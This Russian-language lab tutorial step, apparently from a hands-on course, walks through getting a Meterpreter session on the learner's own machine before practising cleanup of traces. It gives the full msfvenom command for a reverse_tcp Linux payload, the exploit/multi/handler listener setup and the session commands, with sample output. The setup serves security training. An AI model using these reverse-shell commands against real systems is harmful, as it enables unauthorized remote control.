Получение сессии Meterpreter на целевой системе
На этом этапе, прежде чем мы сможем попрактиковаться в очистке системы, нам сначала нужно получить к ней доступ. Мы смоделируем это, создав полезную нагрузку с помощью msfvenom, настроив прослушиватель в Metasploit Framework и затем "выполнив" полезную нагрузку на нашей собственной машине, чтобы получить сессию Meterpreter на localhost.
Сначала откройте терминал и используйте msfvenom для генерации полезной нагрузки Meterpreter для Linux. Эта команда создаст исполняемый файл с именем payload.elf в вашем текущем каталоге (~/project).
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o ~/project/payload.elf
Вы должны увидеть вывод, указывающий на успешную генерацию полезной нагрузки:
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, choosing x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 120 bytes
Final size of elf file: 240 bytes
Saved as: ~/project/payload.elf
Далее запустите консоль Metasploit Framework. Флаг -q заставит ее запуститься тихо, без отображения баннера.
msfconsole -q
Оказавшись в приглашении msfconsole, вам нужно настроить прослушиватель для приема соединения от полезной нагрузки. Мы будем использовать модуль exploit/multi/handler.
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
exploit -j
Команда exploit -j запускает прослушиватель как фоновую задачу, поэтому вы все еще можете использовать консоль. Вы увидите сообщение о запуске обработчика.
Теперь откройте новую вкладку терминала, нажав значок + в окне терминала. На этой новой вкладке сделайте полезную нагрузку исполняемой и запустите ее.
chmod +x ~/project/payload.elf
~/project/payload.elf
Вернитесь на первую вкладку терминала с msfconsole. Вы должны увидеть сообщение, указывающее на открытие сессии Meterpreter.
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36978) at 2023-10-27 10:30:00 -0400
Чтобы взаимодействовать с этой новой сессией, используйте команду sessions.
sessions -i 1
Ваше приглашение должно измениться на meterpreter >, что означает, что вы теперь контролируете сессию.